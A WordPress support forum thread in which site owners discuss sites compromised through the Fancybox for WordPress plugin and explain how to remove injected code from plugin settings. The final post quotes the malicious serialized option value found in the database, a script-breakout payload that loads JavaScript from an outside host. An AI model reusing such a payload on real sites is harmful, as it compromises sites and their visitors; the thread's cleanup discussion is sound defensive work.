Fancybox Hack

One of the sites I developed also had this happen and I isolated it to this plugin.

Strange thing is I run this plugin on 9/10 sites yet have not experienced it w/any of them.

All software is up to date, I’d love some insight!

-Paul

subscribing

Hi,

Regarding fixing affected sites, from what I’ve seen it usually injected an iframe into the source of the site, stored in one of the plugin’s settings. In most cases this can be removed by reverting the plugin settings or manually checking the settings and finding the malicious code, removing it and saving the plugin’s settings. After doing that you can clear cache on the site and check your source code, to see there are no iframes or strange code added in the HEAD tag, especially between the <!– Fancybox for WordPress –> and <!– END of Fancybox for WordPress –> lines.

As I said, I have only seen the vulnerability used for the iframe injection. Nevertheless, for sites that were indeed affected by the issue it’s not a bad idea to change admin and db passwords to be sure.

For more info on the security issue that was found in February, please check https://www.ads-software.com/plugins/fancybox-for-wordpress/faq/

A clients website was unfortunately at the mercy of this attack. I have just deleted and reinstalled the fancybox plugin however the malicous code was still in place upon reinstalling. I found the padding setting within the ‘mfbfw’ row of my database to still have the malicous code. I removed all contents of this row and re-saved my settings within WordPress and the code seems to have gone and all good so far!

This is what I had in the row:
a:1:{s:7:"padding";s:110:"</script><script type="text/javascript" src="https://www.caraparts.co.uk/wp-admin/js/xml.php"></script><script>";}